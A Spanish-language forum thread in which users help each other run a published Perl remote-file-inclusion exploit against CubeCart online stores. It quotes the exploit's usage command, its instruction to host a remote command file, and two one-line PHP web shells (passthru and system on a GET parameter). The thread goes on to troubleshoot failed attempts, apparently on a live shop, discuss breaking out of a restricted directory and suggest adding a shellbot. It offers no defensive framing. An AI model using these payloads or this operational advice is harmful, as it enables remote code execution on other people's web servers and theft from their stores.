en este exploit de RFI con cubecart:
http://milw0rm.com/id.php?id=1398

ya se que es

perl 1398.pl -h host -d /directory

pero lo k no entiendo es esto

4. the php shell
#
# this exploit grabs data via regular epresionje strings. foreign php shell
# scripts will not work with this exploit. use the following code along with
# this exploit and put it in 'cmd.txt' or whatever you please:
#
#       <?passthru($_GET[cmd]);?>

$shel = "http://website.com/cmd.txt";    # cmd shell url

yo creo k ahi debo poner mi sitio web con el comando adentro pero no estyo muy seguro

gracias, me kedo mas claro, aunke mi duda es con el gif, supongo k se debe poner algo dentro como un comando y renombrarlo a gif, verdad?
y gracias de nuevo

no hay caso, me mnte un server en mi pc e instale el cubecart y no me funciono, e hice exactamente lo k me dijiste(y ya lo habia hecho anteriormente correctamente, solo pregunte pk pense que estaba haciendo algo mal pero veo k no)
 
me da este y mas errores en mi server y en otro con cubecart 3.06 Warning: main(): Failed opening '/classes/htmlMimeMail.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/renemix/public_html/ventas/includes/orderSuccess.inc.php on line 35

salu2

naragorn18, solo para aclarar, no es necesario hacer un gif ...
solo metes un .txt en tu pag con el <?system($_GET['c'])?>, y listo.

para los comandos de UNIX:

http://google.com/search?q=UNIX+SHELL+COMMANDS

estaba pensando en anexar un shellbot, pero creo que no es necesario..

Saludos!!

yo creo k seria de gran ayuda ya k solo estoy limitado a un directorio (includes) y no me puedo mo ver de ahi ni con chdir ni con dir, ni con cd.. cd /, etc tp puedo  crear carpetas